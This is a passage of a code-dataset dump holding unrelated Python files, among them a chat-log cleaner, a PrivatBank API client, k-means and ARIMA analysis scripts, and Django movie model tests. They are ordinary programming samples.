\n","sub_path":"projects/synth/korg.py","file_name":"korg.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"237953195","text":"import re\nimport os\n\nscript_dir = os.path.dirname(__file__)\n\ndef cleanChatFunc():\n\tnew_chat_line_pattern = '\\[\\d+\\/\\d+\\/\\d+'\n\n\tbase_chat_path = os.path.join(script_dir, 'data/_chat.txt')\n\tbase_chat = open(base_chat_path, 'r')\n\n\tcleaned_chat_path = os.path.join(script_dir, 'data/cleaned_chat.txt')\n\tcleaned_chat = open(cleaned_chat_path, 'w')\n\n\tline = base_chat.readline().decode('utf-8-sig').encode('utf-8')\n\tis_first_line = True\n\twhile line:\n\t\tif line.rstrip():\n\t\t\tif(re.search(new_chat_line_pattern, line) is None):\n\t\t\t\tcleaned_chat.write(' '+line.rstrip())\n\t\t\telif (is_first_line):\n\t\t\t\tcleaned_chat.write(line.rstrip())\n\t\t\t\tis_first_line = False\n\t\t\telse:\n\t\t\t\tcleaned_chat.write('\\n'+line.rstrip())\n\n\t\tline = base_chat.readline().decode('utf-8-sig').encode('utf-8')\n","sub_path":"whatsapp/cleaner.py","file_name":"cleaner.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"585024592","text":"# -*- coding: utf-8 -*-\n# class Calculator:\n# \tdef __init__(self):\n# \t\tself.result = 0\n# \tdef adder(self,num):\n# \t\tself.result += num\n# \t\treturn self.result\n\n# cal1 = Calculator()\n# cal2 = Calculator()\n\n# print(cal1.adder(3))\n# print(cal1.adder(4))\n\nclass Test:\n i=3\n name=\"park\"\n \n def classFoo(cls2): # 클래스 객체를 암묵적으로 인자로 전달받음.\n print(cls2.name)\n print(\"class method\")\n print(cls2.i) # 클래스 변수 i 출력\n print()\n CFoo = classmethod(classFoo)\n\n def staticFoo(): # 클래스 객체를 인자로 전달받지 않음.\n print(\"static method\")\n print() # 클래스 변수 출력 못함\n SFoo = staticmethod(staticFoo)\n\nTest.CFoo()\nTest.SFoo()","sub_path":"rensyu.py","file_name":"rensyu.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"606825382","text":"\n'''\nSimple model\n'''\n\nfrom opqua.model import Model\n\nmy_model = Model()\nmy_model.newSetup('my_setup',default='vector-borne') # uses default parameters\nmy_model.newPopulation('my_population','my_setup')\nmy_model.addPathogensToHosts( 'my_population',{'AAAAAAAAAA':20} )\nmy_model.run(0,100)\ndata = my_model.saveToDataFrame('Basic_example.csv')\ngraph = my_model.compartmentPlot('Basic_example.png', data)\n","sub_path":"examples/basic_example.py","file_name":"basic_example.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"198185084","text":"import re\nimport sre_constants\n\nfrom ..roles import Var\n\n\ndef validate_regex(regex):\n \"\"\"\n :type regex: str\n :raises: ValueError\n :return:\n \"\"\"\n try:\n re.compile(regex)\n except sre_constants.error as e:\n raise ValueError('Invalid regular expression: {0}'.format(e))\n\n\ndef validate(value_or_var, validator):\n if isinstance(value_or_var, Var):\n for _, value in value_or_var.values:\n validator(value)\n else:\n validator(value_or_var)","sub_path":"jsl/fields/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"26423563","text":"import requests\nfrom lxml import objectify\n\ndef xml_to_json(xml):\n def inner(obj):\n d = dict(obj.attrib)\n childs = obj.getchildren()\n if childs:\n for i in childs:\n if i.tag in d:\n if type(d[i.tag]) is not list:\n d[i.tag] = [d[i.tag]]\n d[i.tag].append(inner(i))\n else:\n d[i.tag] = inner(i)\n return d\n root = objectify.fromstring(xml)\n return inner(root)\n\n\nclass API:\n @staticmethod\n def get_exchange():\n url = 'https://api.privatbank.ua/p24api/pubinfo?exchange&coursid=5'\n resp = requests.get(url)\n resp_json = xml_to_json(resp.content)\n return [x['exchangerate'] for x in resp_json['row']]\n\n @staticmethod\n def get_nbu():\n url = 'https://privat24.privatbank.ua/p24/accountorder?oper=prp&PUREXML&apicour&country='\n resp = requests.get(url)\n resp_json = xml_to_json(resp.content)\n return resp_json['exchangerate']\n\n @staticmethod\n def search_offices(address, city):\n url = 'https://privat24.privatbank.ua/p24/accountorder?oper=prp&PUREXML&pboffice'\n resp = requests.get(url, params={'address': address, 'city': city})\n resp_json = xml_to_json(resp.content)\n return resp_json['pboffice'].get('pboffice', None)\n\n @staticmethod\n def bonus(address, city):\n url = 'https://privat24.privatbank.ua/p24/accountorder?oper=prp&bonus&PUREXML='\n resp = requests.get(url, params={'address': address, 'city': city})\n resp_json = xml_to_json(resp.content)\n return resp_json['bonus'].get('bonus', None)","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"512566448","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import LinearSVC\nfrom sklearn import svm, metrics\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nfrom matplotlib import colors\nfrom sklearn.metrics import classification_report, confusion_matrix, accuracy_score, precision_score, recall_score, \\\n f1_score, fbeta_score\nfrom sklearn.cluster import KMeans\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom sklearn.metrics.cluster import v_measure_score, homogeneity_score\n\n\ndef iris_type(t):\n targets = []\n for i in range(0, len(t)):\n # print(row)\n # print(t.iloc[i])\n\n if t.iloc[i] == 'Iris-setosa':\n # print(t.iloc[i][4])\n # t.iloc[i] = 0\n targets.append(0)\n if t.iloc[i] == 'Iris-versicolor':\n # t.iloc[i] = 1\n targets.append(1)\n if t.iloc[i] == 'Iris-virginica':\n # t.iloc[i] = 2\n targets.append(2)\n return targets\n\n\ndata = pd.read_csv('iris.data.txt', header=None)\nx = data.drop(4, axis=1)\ny = data[4]\n\ntargets = np.array(iris_type(y))\nX = np.array(x)\nestimators = []\nfor i in range(1, 7):\n e1 = 'k-means ' + str(i) + ' clusters'\n estimators.append((e1, KMeans(n_clusters=i)))\n\ntitles = []\nfignum = 1\n\nv_measure = []\nhomogeneity = []\n\ny_pred_3 = []\n\nfor i in range(1, 7):\n title = str(i) + ' clusters'\n titles.append(title)\n# print(titles)\nfor name, est in estimators:\n fig = plt.figure('Task 3.1, Figure ' + str(fignum))\n ax = Axes3D(fig, rect=[0, 0, .95, 1], elev=48, azim=134)\n est.fit(X)\n\n y_pred = est.predict(X)\n\n v_m = v_measure_score(targets, y_pred)\n v_measure.append(v_m)\n h = homogeneity_score(targets, y_pred)\n homogeneity.append(h)\n\n print()\n print('v measure (', name, '): ', v_m)\n\n print()\n\n if name == 'k-means ' + str(3) + ' clusters':\n y_pred_3 = y_pred\n\n labels = est.labels_\n\n ax.scatter(X[:, 0], X[:, 1], X[:, 2], c=labels.astype(np.float), edgecolor='k')\n\n ax.w_xaxis.set_ticklabels([])\n ax.w_yaxis.set_ticklabels([])\n ax.w_zaxis.set_ticklabels([])\n ax.set_xlabel('Sepal length')\n ax.set_ylabel('Sepal weigh')\n ax.set_zlabel('Petal length')\n ax.set_title(titles[fignum - 1])\n ax.dist = 12\n\n plt.savefig('Task31Figure' + str(fignum) + '.png')\n\n fignum = fignum + 1\n\nscore_3 = accuracy_score(y_pred_3, targets)\nprint('The accuracy of 3 clusters: ', score_3)\n\ntick_label = ['1 cluster', '2 cluster', '3 cluster', '4 cluster', '5 cluster', '6 cluster']\nfig = plt.figure('Task 3.1, Figure ' + str(fignum))\nx = list(range(len(homogeneity)))\ntotal_width, n = 0.8, 2\nwidth = total_width / n\n\nplt.bar(x, v_measure, width=width, label='v-measure', tick_label=tick_label)\nplt.legend()\nplt.savefig('Task31accuracy.png')\nplt.show()\n","sub_path":"assignment2/Task3_1.py","file_name":"Task3_1.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"411549374","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nAuthor: Li Yuanming\nEmail: yli056@e.ntu.edu.sg\nDate: 6/19/2020\n\"\"\"\n\nimport os\n\nAPI_V1_STR = '/api/v1'\nAPI_EXP_STR = '/api/exp'\n\nSECRET_KEY = os.getenvb(b\"SECRET_KEY\")\nif not SECRET_KEY:\n SECRET_KEY = os.urandom(32)\n\nACCESS_TOKEN_EXPIRE_MINUTES = 60 * 24 * 8 # 60 minutes * 24 hours * 8 days = 8 days\n\nSERVER_NAME = os.getenv('SERVER_NAME')\nSERVER_HOST = os.getenv('SERVER_HOST', 'localhost')\nSERVER_PORT = int(os.getenv('SERVER_PORT', 8000))\n# a string of origins separated by commas, e.g: \"http://localhost, http://localhost:4200, http://localhost:3000, http://localhost:8080, http://local.dockertoolbox.tiangolo.com\"\nBACKEND_CORS_ORIGINS = os.getenv('BACKEND_CORS_ORIGINS')\nPROJECT_NAME = os.getenv('PROJECT_NAME', 'ModelCI')\n","sub_path":"modelci/app/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"446777263","text":"# rpsutil.py\r\n# Source: https://github.com/DrGFreeman/rps-cv\r\n# This file defines variables and functions to ensure consistancy in capture and\r\n# naming of images.\r\n\r\nimport glob\r\nimport time\r\n\r\nimport numpy as np\r\n\r\n#import camera\r\n\r\n# Define possible gestures as constants\r\nROCK = 0\r\nPAPER = 1\r\nSCISSORS = 2\r\n\r\n# Define text labels corresponding to gestures\r\ngestureTxt = {ROCK: 'rock', PAPER: 'paper', SCISSORS: 'scissors'}\r\n\r\n# Define paths to raw image folders\r\nimgPathsRaw = {ROCK: './img/rock/', PAPER: './img/paper/',\r\n SCISSORS: './img/scissors/'}\r\n\r\ndef cameraSetup():\r\n import camera\r\n \"\"\"Returns a camera object with pre-defined settings.\"\"\"\r\n\r\n # Settings\r\n size = 8\r\n frameRate = 40\r\n #awbFilename = 'awb_gains.txt'\r\n\r\n # Create Camera object\r\n print(\"Initializing camera\")\r\n cam = camera.Camera()\r\n\r\n \"\"\"\r\n # Check if white balance file exists\r\n if len(glob.glob(awbFilename)) != 0:\r\n # File exists, set camera white balance using gains from file\r\n print(\"Reading white balance gains from {}\".format(awbFilename))\r\n cam.readWhiteBalance(awbFilename)\r\n else:\r\n # File does not exist. Prompt user to perform white balance.\r\n print(\"WARNING: No white balance file found. \")\r\n if input(\"Perform white balance (Y/n)?\\n\") != \"n\":\r\n print(\"Performing white balance.\")\r\n print(\"Place a sheet of white paper in front of camera.\")\r\n input(\"Press any key when ready.\\n\")\r\n cam.doWhiteBalance(awbFilename)\r\n \"\"\"\r\n return cam\r\n","sub_path":"rpsutil.py","file_name":"rpsutil.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"433839548","text":"import numpy as np\nimport pandas as pd\nimport statsmodels.api as sm\nimport xlrd as xl\nimport matplotlib.pyplot as plt\nimport statistics as st\nimport seaborn as sns\nfrom math import factorial\nfrom statsmodels.tsa.seasonal import seasonal_decompose as sdecomp\nfrom statsmodels.tsa.adfvalues import mackinnonp, mackinnoncrit\nfrom statsmodels.compat.python import iteritems\nfrom statsmodels.graphics.tsaplots import plot_acf, plot_pacf\nfrom statsmodels.regression.linear_model import OLS\nfrom statsmodels.tools import add_constant\nfrom pandas import datetime, DataFrame\nfrom pandas.core.nanops import nanmean as pd_nanmean\nfrom statsmodels.tsa.arima_model import ARIMA\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.metrics import r2_score\nfrom statsmodels.tools import add_constant\nimport warnings\n\nsns.set(style=\"darkgrid\")\n\n\ndef permutation(m, n):\n return factorial(n) / (factorial(n - m) * factorial(m))\n\n\ndef diff_operator(set, k):\n size = len(set)\n sum = set[0] * (-1)**(size-1)\n for i in range(1, size):\n minus_counter = (-1)**(size-i-1)\n sum = sum + permutation(i, size-1)*minus_counter*set[i]\n return sum\n\n\ndef AIC_finder(test, predict, k, p, counter, q):\n if (counter > 0):\n c = 0\n else:\n c = 1\n n = p + q + c + 1\n predict = np.array(predict)\n ressid = test - predict.ravel()\n sse = sum(ressid**2)\n AIC = n*np.log(sse/n)+2*k\n return AIC\n\n\ndef arima_optimizer_AIC(training, testing, p, max_k, q, flag):\n print(training)\n print()\n print(testing)\n min_AIC_lib = min_our_AIC = 99999\n min_p_lib = min_p_our = 0\n min_q_lib = min_q_our = 0\n for i in range(p+1):\n for j in range(q+1):\n print(\"ARIMA(%d,%d,%d)\" % (i, max_k, j))\n if flag == 0:\n AIC, our_AIC, error, r2, test, predict = arima_learn_forecast(\n training, testing, i, max_k, j)\n r2_score = r2\n else:\n AIC, our_AIC, error, r2, test, predict = arima_learn_predict(\n training, testing, i, max_k, j)\n r2_score = r2\n if (AIC < min_AIC_lib):\n min_AIC_lib = AIC\n min_test_lib = test\n min_predict_lib = predict\n min_p_lib = i\n min_q_lib = j\n r2_score_lib = r2_score\n error_lib = error\n if (our_AIC < min_our_AIC):\n min_our_AIC = our_AIC\n min_test_our = test\n min_predict_our = predict\n min_p_our = i\n min_q_our = j\n r2_score_our = r2_score\n error_our = error\n print()\n print(\"Best ARIMA by loglikehood AIC = ARIMA(%d,%d,%d)\" %\n (min_p_lib, max_k, min_q_lib))\n print(\"Minimal loglikehood AIC = \", min_AIC_lib)\n print('Test MSE: %.3f' % error_lib)\n print(\"r2 score: \", r2_score_lib)\n print()\n print(\"Best ARIMA by SSE AIC = ARIMA(%d,%d,%d)\" %\n (min_p_our, max_k, min_q_our))\n print(\"Minimal SSE AIC = \", min_our_AIC)\n print('Test MSE: %.3f' % error_our)\n print(\"r2 score: \", r2_score_our)\n plt.plot(min_test_lib)\n if (flag == 1):\n x = range(360, 360+len(min_predict_lib))\n plt.plot(x, min_predict_lib, color='red')\n else:\n plt.plot(min_predict_lib, color='red')\n plt.show()\n\n\ndef arima_learn_forecast(training, testing, p, max_k, q):\n warnings.simplefilter('ignore')\n x = training.values\n size = int(len(training.values))\n train, test = training.values, testing.values\n history = [x for x in train]\n predictions = list()\n for t in range(len(test)):\n model = ARIMA(history, order=(p, max_k, q))\n model_fit = model.fit(disp=0)\n output = model_fit.forecast()\n yhat = output[0]\n predictions.append(yhat)\n obs = test[t]\n history.append(obs)\n print('predicted=%f, expected=%f' % (yhat, obs))\n error = mean_squared_error(test, predictions)\n print('Test MSE: %.3f' % error)\n r2 = r2_score(test, predictions)\n print(\"r2 score: \", r2)\n regr = OLS(test, predictions).fit()\n our_aic = AIC_finder(test, predictions, len(test), p, max_k, q)\n print(\"OLS AIC: \", regr.aic)\n print(\"Our AIC: \", our_aic)\n return regr.aic, our_aic, error, r2, test, predictions\n\n\ndef arima_learn_predict(training, testing, p, max_k, q):\n warnings.simplefilter('ignore')\n x = training.values\n size = int(len(training.values))\n train, test = training.values, testing.values\n history = [x for x in train]\n predictions = list()\n for t in range(len(test)):\n model = ARIMA(history, order=(p, max_k, q))\n model_fit = model.fit(disp=0)\n output = model_fit.predict(start=len(train), end=(\n len(train)+len(test)-1), typ='levels')\n yhat = output[0]\n predictions.append(yhat)\n obs = test[t]\n history.append(yhat)\n print('predicted=%f, expected=%f' % (yhat, obs))\n error = mean_squared_error(test, predictions)\n print('Test MSE: %.3f' % error)\n r2 = r2_score(test, predictions)\n print(\"r2 score: \", r2)\n x = range(len(train), len(train)+len(test))\n print(len(x), len(train))\n regr = OLS(test, predictions).fit()\n our_aic = AIC_finder(test, predictions, len(test), p, max_k, q)\n print(\"OLS AIC: \", regr.aic)\n print(\"Our AIC: \", our_aic)\n return regr.aic, our_aic, error, r2, np.append(train, test), predictions\n\n\ndef best_train_finder(training, p, max_k, q):\n X = training.values\n size = int(len(X) * 0.1)\n train, test = X[0:size], X[size:len(X)]\n history = [x for x in train]\n predictions = list()\n for t in range(len(test)):\n model = ARIMA(history, order=(5, 1, 0))\n model_fit = model.fit(disp=0)\n output = model_fit.forecast()\n yhat = output[0]\n predictions.append(yhat)\n obs = test[t]\n history.append(obs)\n print('predicted=%f, expected=%f' % (yhat, obs))\n error = mean_squared_error(test, predictions)\n print('Test MSE: %.3f' % error)\n print(\"r2 score: \", r2_score(test, predictions))\n # plot\n plt.plot(test)\n plt.plot(predictions, color='red')\n plt.show()\n\n\ndef integral_definer(df):\n values = df\n oper_values = np.array([0]).astype(float)\n counter = 0\n flag = 0\n max_k = 0\n for k in range(1, len(values)):\n if flag:\n continue\n for i in range(1, len(values)+1):\n if ((i-k-1) >= 0):\n oper_values = np.append(oper_values, 0)\n oper_values[i-1] = diff_operator(values[i-k-1:i], k)\n oper_values_cutted = oper_values[k:len(\n oper_values)+(1-k)*(len(values)-k) + counter]\n counter = counter - (k-1)\n print(k, \" test: \")\n if df_test(oper_values_cutted):\n flag = 1\n max_k = k\n ans = oper_values_cutted\n return max_k, ans\n\n\ndef avg_data(df): # скользящая средняя\n rows, columns = df.shape\n averages = []\n averages.append(df['Value'][0])\n for i in range(1, rows):\n elem = 0\n for j in range(i):\n elem = elem + df['Value'][j]\n elem = elem/i\n averages.append(elem)\n return averages\n\n\ndef white_noise(df): # первые разности\n rows, columns = df.shape\n noise = []\n noise.append(df['Value'][0])\n for i in range(1, rows):\n noise.append(df['Value'][i]-df['Value'][i-1])\n noise[0] = noise[1]\n return noise\n\n\ndef get_lag(mod, endog, exog, start_lag, max_lag, method, model_args=()):\n results = {} # dict\n method = method.lower()\n for lag in range(start_lag, start_lag + max_lag + 1):\n results[lag] = mod(endog, exog[:, :lag], *model_args).fit()\n if method == \"aic\":\n best_inf_crit, best_lag = min((v.aic, k) for k, v in iteritems(\n results)) # перебор по значениям из results\n return best_inf_crit, best_lag\n\ndef df_test(df):\n df_vect = df\n df_size = len(df_vect)\n autolag = 'AIC'\n max_lag = None\n regression = 'c'\n trend_size = len(regression) # размер тренда\n # Максимальное запаздывание, вычисляется как Т��Г соотвествующего выражения\n max_lag = int(np.ceil(12. * np.power(df_size / 100., 1/2)))\n max_lag = min(df_size // 2 - trend_size, max_lag)\n if max_lag < 0:\n raise ValueError('Dataset is too short')\n # массив с первыми разностями: элем_i = a[i+1] - a[i]\n df_diff = np.diff(df_vect)\n # массив с лагами, где max_lag - число \"сдвигов\" вниз\n df_diff_all = sm.tsa.lagmat(\n df_diff[:, None], max_lag, trim='both', original='in')\n df_size = df_diff_all.shape[0] # количество столбцов в массиве лагов\n # заменяем первый столбец df_diff_all на df_vect\n df_diff_all[:, 0] = df_vect[-df_size - 1:-1]\n df_diff_short = df_diff[-df_size:] # оставляем последние df_size элементов\n df_diff_full = df_diff_all\n start_lag = df_diff_full.shape[1] - \\\n df_diff_all.shape[1] + 1 # начальный лаг\n best_inf_crit, best_lag = get_lag(\n sm.OLS, df_diff_short, df_diff_full, start_lag, max_lag, autolag)\n best_lag -= start_lag # оптимальное значение лага\n # массив с лагами, но уже при оптимальном значении лага\n df_diff_all = sm.tsa.lagmat(\n df_diff[:, None], best_lag, trim='both', original='in')\n df_size = df_diff_all.shape[0]\n # заменяем первый столбец df_diff_all на df_vect\n df_diff_all[:, 0] = df_vect[-df_size - 1:-1]\n df_diff_short = df_diff[-df_size:]\n use_lag = best_lag\n # аппроксимация ряда методом наименьших квадратов\n resols = sm.OLS(df_diff_short, sm.tsa.add_trend(\n df_diff_all[:, :use_lag + 1], regression)).fit()\n adfstat = resols.tvalues[0] # получение необходимой статистики\n pvalue = mackinnonp(adfstat, regression=regression, N=1)\n critvalues = mackinnoncrit(N=1, regression=regression, nobs=df_size)\n if adfstat < critvalues[1]:\n print(\"Time series is stationary with crit value \", adfstat)\n return True\n else:\n print(\"Time series is not stationary with crit value \", adfstat)\n return False\n\n\ndef series_seasonal(df, window):\n seasonal = np.array([pd_nanmean(df[i::window], axis=0)\n for i in range(window)])\n return seasonal\n\n\ndef series_decompose_sum(df, window): # Аддитивная модель\n avg = df.Value.rolling(window=30).mean() # trend, но по-другому\n no_trend = df.Value - avg\n seasonal = series_seasonal(no_trend, 30)\n seasonal = seasonal - np.mean(seasonal, axis=0)\n size = no_trend.shape[0]\n season = np.tile(seasonal.T, size // window + 1).T[:size] # window = 30\n df['Season1'] = season\n sea_son = df.Season1\n residual = df.Value - avg - season\n return avg, sea_son, residual\n\n\ndef series_decompose_mul(df, window): # Мультипликативная модель\n avg = df.Value.rolling(window=30).mean() # trend, но по-другому\n no_trend = df.Value/avg\n seasonal = series_seasonal(no_trend, 30)\n seasonal = seasonal - np.mean(seasonal, axis=0)\n size = no_trend.shape[0]\n season = np.tile(seasonal.T, size // window + 1).T[:size] # window = 30\n df['Season2'] = season\n sea_son = df.Season2\n residual = df.Value - avg - season\n return avg, sea_son, residual\n\n\n# MAIN\ntraining = pd.read_excel('training.xlsx')\ntraining_decomp = pd.read_excel('training.xlsx')\nprint(training.columns) # названия столбов\n\n# добавляем новый столбец в наш dataframe\ntraining['Average'] = avg_data(training)\nresid = [training['Average'][0]]\n# добавляем новый столбец в наш dataframe\ntraining['Noise'] = white_noise(training)\nfor i in range(1, len(training['Average'])):\n resid.append(training['Average'][i] -\n training['Average'][i - 1] - training['Noise'][i])\nresid[0] = resid[1]\ntraining['Residual'] = resid # добавляем новый столбец в наш dataframe\ndecomp_avg_add, decomp_season_add, decomp_resid_add = series_decompose_sum(\n training, 30)\ndecomp_avg_mult, decomp_season_mult, decomp_resid_mult = series_decompose_mul(\n training, 30)\n\n# Рисуем красивые графики\nfig = plt.figure(figsize=(20, 10), num='Time Series Decomposition')\nax1 = fig.add_subplot(321, title=\"Additive model\", ylabel=\"Trend\")\nax2 = fig.add_subplot(322, title=\"Multiplicative model\")\nax3 = fig.add_subplot(323, ylabel=\"Season\")\nax4 = fig.add_subplot(324)\nax5 = fig.add_subplot(325, ylabel=\"Residue\")\nax6 = fig.add_subplot(326)\nsns.lineplot(data=decomp_avg_add, ax=ax1)\nsns.lineplot(data=decomp_season_add, ax=ax3)\nsns.lineplot(data=decomp_resid_add, ax=ax5)\nsns.lineplot(data=decomp_avg_mult, ax=ax2)\nsns.lineplot(data=decomp_season_mult, ax=ax4)\nsns.lineplot(data=decomp_resid_mult, ax=ax6)\n\nplt.show()\n\nprint(\"Our test:\")\ndf_test(training['Value'])\nprint(\"Library test:\")\n# Проверяем рабочесть нашего теста Дики-Фуллера на библиотечном\nprint(sm.tsa.adfuller(training['Value']))\n\nprint()\n\n# Поиск порядка интегрируемости\nvalues = training['Value'].to_numpy()\nmax_k, training_max_k = integral_definer(values)\nprint(\"Порядок интегрируемости: \", max_k)\n\n# Ввод необходимый для работы ARIMA\ntraining = pd.read_excel('training.xlsx', header=0, parse_dates=[\n 0], index_col=0, squeeze=True)\ntesting = pd.read_excel('testing.xlsx', header=0, parse_dates=[\n 0], index_col=0, squeeze=True)\n\n# Тут мы определяем параметры ARMA модели (p,q)\n# Для нашей модели надо проверить p = 0,1,2 и q = 0,1,2,3,4\nplt.figure(figsize=(8, 8))\nplt.subplot(211)\nplot_acf(training_max_k, ax=plt.gca())\nplt.subplot(212)\nplot_pacf(training_max_k, ax=plt.gca())\nplt.show()\n\n# Модель обучается и предсказывает\narima_optimizer_AIC(training, testing, 1, 1, 4, 0)\nbest_train_finder(training, 1, max_k, 4)\n","sub_path":"Bachelor/Third grade/Python/Task2/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":14530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"160953898","text":"#! /usr/bin/python3\n\n\nfrom random import random\nfrom sys import argv\n\n\ndef random_selection(*args):\n rnd = []\n for a in args:\n mn, mx = a\n rnd.append(random() * (mx - mn) + mn)\n return tuple(rnd)\n\n\n\ndef generate_balls(num, base):\n \"\"\"\n \"\"\"\n mass_range = tuple(((0.2, 10),))\n size_range = tuple(((0.03, 0.30),))\n color_range = tuple(((0.1, 1.0), (0.1, 1.0), (0.1, 1.0)))\n x_range = tuple(((-20, 20),))\n y_range = tuple(((10, 100),))\n vxy_range = tuple(((-1,1),(-1,1)))\n\n\n for i in range(num):\n m, = random_selection(*mass_range)\n ri, = random_selection(*size_range)\n r, g, b = random_selection(*color_range)\n x, = random_selection(*x_range)\n y, = random_selection(*y_range)\n vx,vy = random_selection(*vxy_range)\n print(' ' \\\n % (m, x, y, vx, vy, ri))\n print(' ' \\\n % (i+base, 0, g, g))\n print('')\n\n\n\ndef main(name, args):\n \"\"\"\n \"\"\"\n num = 100\n base = 4\n\n if args:\n for i, arg in enumerate(args):\n if i==0:\n num = int(arg)\n elif i==1:\n base = int(arg)\n else:\n break\n\n generate_balls(num, base)\n\n\n\nif __name__ == \"__main__\":\n main(argv[0], argv[1:])\n\n","sub_path":"t4m1/build/FOSSSim/balls.py","file_name":"balls.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"85747639","text":"import smake\nimport os\nenv = os.environ\nif '4' in smake.options.build_suffix:\n env['PATH'] = '/home/erin/apps/gcc-install-4.1.1/bin:' + env['PATH']\n env['LD_LIBRARY_PATH'] = '/home/erin/apps/gcc-install-4.1.1/lib:' + env.get('LD_LIBRARY_PATH', '')\n env['BOOSTROOT'] = '/home/erin/libs/boost_1_33_1_gcc41'\n env['BOOSTLIBDIR'] = '/home/erin/libs/boost_1_33_1_gcc41/stage/lib'\n env['PYINCLUDEDIR'] = '/home/erin/apps/usr/local/include/python2.4'\n env['ENABLEPYMODS'] = '1'\n del env['XERCESCROOT']\nelse:\n env['ENABLEPYMODS'] = '1'\n env['PYINCLUDEDIR'] = '/usr/include/python2.3'\n","sub_path":".smake/customizenix.py","file_name":"customizenix.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"484309954","text":"# coding: utf-8\n\nimport mock\nimport logging\n\nimport responses\n\nfrom django.core.urlresolvers import reverse\n\nfrom django.test import TestCase, Client\nfrom django.test.utils import override_settings\nfrom django.core.files.base import File\n\nfrom movie.tasks import cleanup\nfrom movie.factories import MovieFactory, GenreFactory, ImdbFactory\nfrom actor.factories import ActorFactory\n\n\nclass GenreModelTests(TestCase):\n def setUp(self):\n self.genre = GenreFactory(name='Action', slug='action')\n\n def test_get_str(self):\n self.assertEqual('Action', str(self.genre))\n\n\n@override_settings(\n CELERY_EAGER_PROPAGATES_EXCEPTIONS=True,\n CELERY_ALWAYS_EAGER=True,\n BROKER_BACKEND='memory')\nclass MovieModelTests(TestCase):\n def setUp(self):\n genres = GenreFactory.create_batch(3)\n cast = ActorFactory.create_batch(2)\n self.movie = MovieFactory.create(\n title='Bottle Shock',\n slug='bottle-shock',\n genres=genres,\n cast=cast)\n\n def test_get_str(self):\n self.assertEqual('Bottle Shock', str(self.movie))\n\n def test_get_absolute_url(self):\n expected = '/movie/bottle-shock/'\n result = self.movie.get_absolute_url()\n self.assertEqual(expected, result)\n\n def test_add_genres(self):\n genres = ['Comedy', 'Romance']\n self.movie.add_genres(genres)\n self.assertEqual(2, self.movie.genres.count())\n\n def test_add_cast(self):\n actors = [\n 'Clint Eastwood',\n 'Tom Cruise',\n 'Bruce Willis',\n 'Jean-Claude Van Damme',\n 'Arnold Schwarzenegger']\n\n self.movie.add_cast(actors)\n self.assertEqual(5, self.movie.cast.count())\n\n @mock.patch('movie.models.cleanup.delay')\n def test_if_post_delete_is_connected(self, mock):\n movie = MovieFactory()\n movie.delete()\n mock.assert_called_once_with(movie)\n\n @mock.patch('movie.tasks.logger.info')\n def test_task_cleanup(self, mock):\n file_mock = mock.MagicMock(spec=File, name='FileMock')\n movie = MovieFactory.create()\n movie.poster = file_mock\n\n cleanup.run(movie)\n\n expected = 'The poster from %s was removed from filesystem' % movie\n mock.assert_called_once_with(expected)\n\n def test_task_cleanup_with_movie_without_poster(self):\n movie = MovieFactory.create()\n result = cleanup.run(movie)\n self.assertIsNone(result)\n\n def test_get_prepared_query(self):\n expected = \"\"\"\n SELECT g.total + c.total\n FROM\n (\n SELECT COUNT (*) AS total\n FROM movie_movie_genres\n WHERE movie_id = movie_movie.id AND genre_id IN (1,2,3,0)\n ) g,\n (\n SELECT COUNT (*) AS total\n FROM movie_movie_cast\n WHERE movie_id = movie_movie.id AND actor_id IN (1,0)\n ) c\n \"\"\"\n\n result = self.movie._get_prepared_query()\n self.assertEqual(expected, result)\n\n def test_get_similar_movies(self):\n war = GenreFactory.create(name='War')\n crime = GenreFactory.create(name='Crime')\n comedy = GenreFactory.create(name='Comedy')\n adventure = GenreFactory.create(name='Adventure')\n\n scarlett = ActorFactory.create(name='Scarlett Johansson')\n chris = ActorFactory.create(name='Chris Evans')\n paul = ActorFactory.create(name='Paul Rudd')\n emily = ActorFactory.create(name='Emily VanCamp')\n\n john = ActorFactory.create(name='John Doe')\n\n fat = MovieFactory(\n title='Fat to be ignored',\n genres=(crime,),\n cast=(john,))\n\n MovieFactory.create_batch(25, genres=(crime, adventure,), cast=(john,))\n\n civil_war = MovieFactory.create(\n title='Captain America: Civil War',\n cast=(scarlett, chris, paul, emily,),\n genres=(war, comedy,))\n\n winter_soldier = MovieFactory.create(\n title='Captain America: The Winter Soldier',\n cast=(scarlett, chris,),\n genres=(war, crime,))\n\n ant_man = MovieFactory.create(\n title='Ant-Man',\n cast=(scarlett, paul, 